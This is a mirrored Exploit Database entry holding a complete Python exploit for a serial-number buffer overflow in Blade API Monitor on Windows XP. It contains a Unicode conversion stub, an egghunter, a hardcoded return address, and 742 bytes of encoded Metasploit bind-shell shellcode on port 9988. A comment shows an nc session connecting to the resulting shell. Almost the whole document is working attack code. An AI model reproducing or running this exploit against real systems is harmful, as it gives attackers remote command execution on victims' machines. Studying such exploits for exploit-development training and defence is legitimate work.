Blade API Monitor – Unicode Bypass Serial Number Buffer Overflow

• Exploit Database
• 112 阅读

• 作者： b33f
  日期： 2012-02-20
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/18500/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139

  #!/usr/bin/python -w   #---------------------------------------------------------------------------------# # Exploit: Blade API Monitor Unicode Bypass (Serial Number BOF) # # Author: b33f (Ruben Boonen) - http://www.fuzzysecurity.com# # http://www.fuzzysecurity.com/exploits/8.html# # OS: WinXP PRO SP3 # # Software: https://www.exploit-db.com/apps/# # f248239d09b37400e8269cb1347c240e-BladeAPIMonitor-3.6.9.2.Setup.exe# # # # Unicode Exploit by FullMetalFouad - http://www.exploit-db.com/exploits/18349/ # #---------------------------------------------------------------------------------# # This is a super strange exploit. First I would like to commend "FullMetalFouad" # # for the unicode work on the original exploit. Originally I wanted to see if I # # could simplify the process. While I was doing that I lost sight of the fact # # that the instructions had to be printable since we need to copy them from a # # text file. When I opened my POC I saw that all the characters had been# # converted to weird blocks (check my site for a screenshot). On a whim I tried # # to paste these characters in the serial number field and amazingly the buffer # # in the debugger was intact but with one important difference, the unicode had # # been converted back to regular ASCII!! Very strange but super fortunate!! If# # you want to experiment with the exploit just keep in mind to (1) open it in # # windows notepad and (2) that all the characters need to be converted to those # # blocks for it to work (depending on your buffer this isn't always the case).# #---------------------------------------------------------------------------------# # root@bt:~# nc -nv 192.168.111.128 9988# # (UNKNOWN) [192.168.111.128] 9988 (?) open # # Microsoft Windows XP [Version 5.1.2600] # # (C) Copyright 1985-2001 Microsoft Corp. # # # # C:\Program Files\BladeAPIMonitor>ipconfig # # ipconfig# # # # Windows IP Configuration# # # # # # Ethernet adapter Local Area Connection: # # # #Connection-specific DNS Suffix. : localdomain# #IP Address. . . . . . . . . . . . : 192.168.111.128# #Subnet Mask . . . . . . . . . . . : 255.255.255.0# #Default Gateway . . . . . . . . . :# # # # C:\Program Files\BladeAPIMonitor> # #---------------------------------------------------------------------------------#   filename="PasteMe.txt"   #---------------------------------------------------------------------------------# # Originally unicode instructions to put an address in EAX, here it is used to# # trigger notepad bug and get UNICODE => ASCII conversion...# #---------------------------------------------------------------------------------# UniKill = ( "\xB8\x06\xAA\x6F\x50" "\x6F\x4C\x6F\x58\x6F" "\x05\x73\x00\x6F\xB0" "\xB9\xD8\xAA\x6F\xE8")   #Egghunter - Marker b33f #Size 32-bytes hunter = ( "\x66\x81\xca\xff" "\x0f\x42\x52\x6a" "\x02\x58\xcd\x2e" "\x3c\x05\x5a\x74" "\xef\xb8\x62\x33" #b3 "\x33\x66\x8b\xfa" #3f "\xaf\x75\xea\xaf" "\x75\xe7\xff\xe7")   #msfpayload windows/shell_bind_tcp LPORT=9988 R| msfencode -e x86/alpha_mixed -t c #Size 742-bytes shellcode = ( "\xd9\xe1\xd9\x74\x24\xf4\x59\x49\x49\x49\x49\x49\x49\x49\x49" "\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41\x58" "\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42" "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c" "\x48\x68\x4b\x39\x37\x70\x45\x50\x53\x30\x71\x70\x4f\x79\x69" "\x75\x34\x71\x79\x42\x53\x54\x4c\x4b\x71\x42\x64\x70\x6c\x4b" "\x42\x72\x66\x6c\x6c\x4b\x73\x62\x57\x64\x4e\x6b\x73\x42\x36" "\x48\x36\x6f\x4f\x47\x71\x5a\x44\x66\x56\x51\x49\x6f\x75\x61" "\x69\x50\x4c\x6c\x45\x6c\x61\x71\x61\x6c\x63\x32\x44\x6c\x47" "\x50\x49\x51\x6a\x6f\x56\x6d\x55\x51\x49\x57\x4b\x52\x58\x70" "\x62\x72\x76\x37\x4e\x6b\x56\x32\x34\x50\x6c\x4b\x47\x32\x37" "\x4c\x73\x31\x5a\x70\x6c\x4b\x61\x50\x62\x58\x4d\x55\x49\x50" "\x63\x44\x50\x4a\x36\x61\x5a\x70\x50\x50\x6e\x6b\x33\x78\x74" "\x58\x4c\x4b\x63\x68\x57\x50\x45\x51\x4a\x73\x38\x63\x67\x4c" "\x42\x69\x4e\x6b\x56\x54\x6c\x4b\x47\x71\x7a\x76\x35\x61\x59" "\x6f\x56\x51\x49\x50\x6e\x4c\x6b\x71\x4a\x6f\x46\x6d\x67\x71" "\x48\x47\x46\x58\x59\x70\x62\x55\x4a\x54\x56\x63\x43\x4d\x79" "\x68\x75\x6b\x73\x4d\x46\x44\x63\x45\x4b\x52\x61\x48\x6e\x6b" "\x70\x58\x46\x44\x65\x51\x4b\x63\x32\x46\x4c\x4b\x44\x4c\x50" "\x4b\x4c\x4b\x46\x38\x77\x6c\x65\x51\x6b\x63\x4c\x4b\x76\x64" "\x6e\x6b\x56\x61\x38\x50\x6e\x69\x32\x64\x76\x44\x44\x64\x71" "\x4b\x71\x4b\x75\x31\x73\x69\x72\x7a\x72\x71\x59\x6f\x59\x70" "\x76\x38\x63\x6f\x51\x4a\x4c\x4b\x74\x52\x78\x6b\x4e\x66\x71" "\x4d\x51\x78\x67\x43\x46\x52\x37\x70\x43\x30\x31\x78\x71\x67" "\x51\x63\x35\x62\x71\x4f\x76\x34\x42\x48\x50\x4c\x53\x47\x31" "\x36\x54\x47\x69\x6f\x49\x45\x68\x38\x4e\x70\x37\x71\x67\x70" "\x35\x50\x37\x59\x7a\x64\x52\x74\x50\x50\x63\x58\x51\x39\x4b" "\x30\x30\x6b\x75\x50\x39\x6f\x69\x45\x32\x70\x76\x30\x42\x70" "\x66\x30\x73\x70\x62\x70\x31\x50\x42\x70\x43\x58\x49\x7a\x64" "\x4f\x4b\x6f\x39\x70\x59\x6f\x5a\x75\x6b\x39\x78\x47\x30\x31" "\x49\x4b\x62\x73\x33\x58\x74\x42\x43\x30\x65\x77\x53\x34\x4c" "\x49\x4a\x46\x70\x6a\x44\x50\x46\x36\x56\x37\x63\x58\x79\x52" "\x39\x4b\x34\x77\x55\x37\x6b\x4f\x38\x55\x62\x73\x76\x37\x53" "\x58\x6f\x47\x4b\x59\x37\x48\x6b\x4f\x69\x6f\x58\x55\x72\x73" "\x30\x53\x53\x67\x50\x68\x54\x34\x78\x6c\x65\x6b\x6b\x51\x39" "\x6f\x6e\x35\x61\x47\x6c\x49\x78\x47\x73\x58\x31\x65\x70\x6e" "\x30\x4d\x45\x31\x79\x6f\x49\x45\x43\x58\x50\x63\x70\x6d\x43" "\x54\x67\x70\x4d\x59\x39\x73\x76\x37\x53\x67\x32\x77\x56\x51" "\x69\x66\x30\x6a\x52\x32\x36\x39\x33\x66\x6a\x42\x6b\x4d\x62" "\x46\x6b\x77\x30\x44\x34\x64\x35\x6c\x43\x31\x67\x71\x4c\x4d" "\x50\x44\x74\x64\x32\x30\x6f\x36\x75\x50\x53\x74\x70\x54\x32" "\x70\x70\x56\x56\x36\x76\x36\x62\x66\x76\x36\x72\x6e\x36\x36" "\x52\x76\x71\x43\x30\x56\x73\x58\x64\x39\x7a\x6c\x35\x6f\x6c" "\x46\x59\x6f\x6e\x35\x6b\x39\x59\x70\x70\x4e\x51\x46\x47\x36" "\x39\x6f\x34\x70\x55\x38\x44\x48\x6c\x47\x37\x6d\x33\x50\x49" "\x6f\x4a\x75\x6d\x6b\x5a\x50\x6f\x45\x79\x32\x72\x76\x55\x38" "\x4f\x56\x4d\x45\x4f\x4d\x4f\x6d\x6b\x4f\x69\x45\x47\x4c\x67" "\x76\x43\x4c\x55\x5a\x6d\x50\x79\x6b\x4d\x30\x51\x65\x33\x35" "\x4f\x4b\x62\x67\x37\x63\x31\x62\x62\x4f\x53\x5a\x37\x70\x76" "\x33\x49\x6f\x4b\x65\x41\x41")   #---------------------------------------------------------------------------------# # (*) Due to the wierd conversion i couldn't do proper badchar analysis # # (1) 0x00425e04 : push esp #ret| startnull,ascii ==> BladeAPIMonitor.exe # # (2) egghunter: We do this because we need more space than we have at ESP# # (3) alpha mixed Bindshell port 9988 # #---------------------------------------------------------------------------------#   egg = "\x90"*18 + hunter evil = "\x90"*10 + "b33f"*2 + shellcode buffer = UniKill + "A"*560 + "\x04\x5E\x42\x00" + egg + "B"*500 + evil   textfile = open(filename , 'w') textfile.write(buffer) textfile.close()